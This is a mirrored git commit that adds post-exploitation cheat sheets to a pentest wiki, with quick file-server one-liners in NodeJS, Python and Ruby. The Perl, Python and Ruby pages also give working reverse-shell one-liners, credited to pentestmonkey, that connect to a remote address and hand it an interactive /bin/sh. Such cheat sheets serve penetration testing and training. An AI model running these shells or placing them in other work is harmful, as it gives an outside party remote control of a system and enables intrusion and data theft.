mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
bring everything up
This commit is contained in:
8
scripting/NodeJS.md
Normal file
8
scripting/NodeJS.md
Normal file
@@ -0,0 +1,8 @@
|
||||
# NodeJS Commands and Scripts for Post Exploitation
|
||||
|
||||
|
||||
**Start a web server that serves the local files on port 8080**
|
||||
```
|
||||
npm install -g http-server
|
||||
http-server
|
||||
```
|
||||
5
scripting/perl.md
Normal file
5
scripting/perl.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Perl Commands and Scripts for Post Exploitation
|
||||
|
||||
**Perl reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
|
||||
|
||||
```perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'```
|
||||
13
scripting/python.md
Normal file
13
scripting/python.md
Normal file
@@ -0,0 +1,13 @@
|
||||
# Python Command and Scripts for Post Exploitation
|
||||
|
||||
One liners
|
||||
-----------
|
||||
|
||||
**Start a web server that serves the local files on port 8000, single threaded**
|
||||
```python
|
||||
python -m SimpleHTTPServer 8000
|
||||
```
|
||||
|
||||
**Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
|
||||
|
||||
```python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'```
|
||||
12
scripting/ruby.md
Normal file
12
scripting/ruby.md
Normal file
@@ -0,0 +1,12 @@
|
||||
# Ruby Command and Scripts for Post Exploitation
|
||||
|
||||
One liners
|
||||
-----------
|
||||
|
||||
**Start a web server that serves the local files from current directory on port 8001**
|
||||
|
||||
```ruby -run -e httpd -- -p 8001 .```
|
||||
|
||||
**Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
|
||||
|
||||
```ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```
|
||||
Reference in New Issue
Block a user